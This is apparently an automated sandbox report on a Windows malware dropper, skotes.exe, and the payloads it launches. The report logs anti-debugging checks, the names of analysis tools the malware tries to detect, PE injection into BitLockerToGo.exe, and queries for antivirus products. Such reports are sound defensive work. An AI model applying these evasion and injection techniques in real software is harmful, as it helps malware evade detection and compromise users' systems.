Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

Code function: 0_2_05800484 rdtsc

0_2_05800484

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Code function: 10_2_00445B00 LdrInitializeThunk,

10_2_00445B00

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0072652B mov eax, dword ptr fs:[00000030h]	6_2_0072652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0072A302 mov eax, dword ptr fs:[00000030h]	6_2_0072A302
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 7_2_029153DD mov edi, dword ptr fs:[00000030h]	7_2_029153DD
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 7_2_0291555A mov edi, dword ptr fs:[00000030h]	7_2_0291555A
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 14_2_02E3913D mov edi, dword ptr fs:[00000030h]	14_2_02E3913D
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 14_2_02E392BA mov edi, dword ptr fs:[00000030h]	14_2_02E392BA

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Code function: 7_2_029153DD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

7_2_029153DD

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Memory written: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Memory written: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A2008
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 455000
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C4C008
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42A000
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42D000
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C95008
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42A000
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42D000

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe "C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe "C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe "C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe "C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe "C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe "C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe "C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe "C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe "C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Process created: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe "C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1896 -ip 1896	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 1136	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1048 -ip 1048	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 956	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Process created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe "C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe"
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Source: Bjkm5hE.exe, 00000026.00000002.3411107517.0000000000F91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Bjkm5hE.exe, 00000026.00000002.3411107517.0000000000F91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: b4fe2af6b4.exe, b4fe2af6b4.exe, 00000016.00000002.2875296968.0000000000708000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: O_sProgram Manager
Source: Bjkm5hE.exe, 00000026.00000002.3411107517.0000000000F91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: 1w5RpHuliE.exe, 00000000.00000002.2099916542.00000000010BB000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2125350514.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2127455688.00000000008DB000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: ^Program Manager
Source: Bjkm5hE.exe, 00000026.00000002.3411107517.0000000000F91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: skotes.exe	Binary or memory string: ^Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0070D3E2 cpuid

6_2_0070D3E2

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: xkV9ZML.exe, 0000000A.00000002.2752619840.000000000142F000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3064743781.0000000000B96000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000002.3107819705.0000000000B96000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3101095633.0000000000B96000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3072818306.0000000000B96000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3070587146.0000000000B96000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3087115183.0000000000B96000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3065177034.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000002.3106028667.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3101213262.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
